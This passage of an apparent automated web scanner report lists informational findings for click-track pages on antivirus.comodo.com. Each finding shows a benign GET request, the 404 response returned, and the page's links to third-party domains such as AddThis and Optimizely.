Host:   http://antivirus.comodo.com
Path:   /click-track/LEAD/CAM/SLIDER/CIS-PRO

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /click-track/LEAD/CAM/SLIDER/CIS-PRO?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:20 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.14. http://antivirus.comodo.com/click-track/NAV/BusinessAV  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/NAV/BusinessAV

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /click-track/NAV/BusinessAV?pagelink=Global-Header HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:48 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.15. http://antivirus.comodo.com/click-track/NAV/CleanMyPC  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/NAV/CleanMyPC

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /click-track/NAV/CleanMyPC?pagelink=Global-Header HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:47 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.16. http://antivirus.comodo.com/click-track/NAV/Compare  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/NAV/Compare

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /click-track/NAV/Compare?pagelink=Global-Header HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:47 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.17. http://antivirus.comodo.com/click-track/NAV/Innovation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/NAV/Innovation

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /click-track/NAV/Innovation?pagelink=Global-Header HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:46 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.18. http://antivirus.comodo.com/click-track/NAV/Products  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/NAV/Products

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains: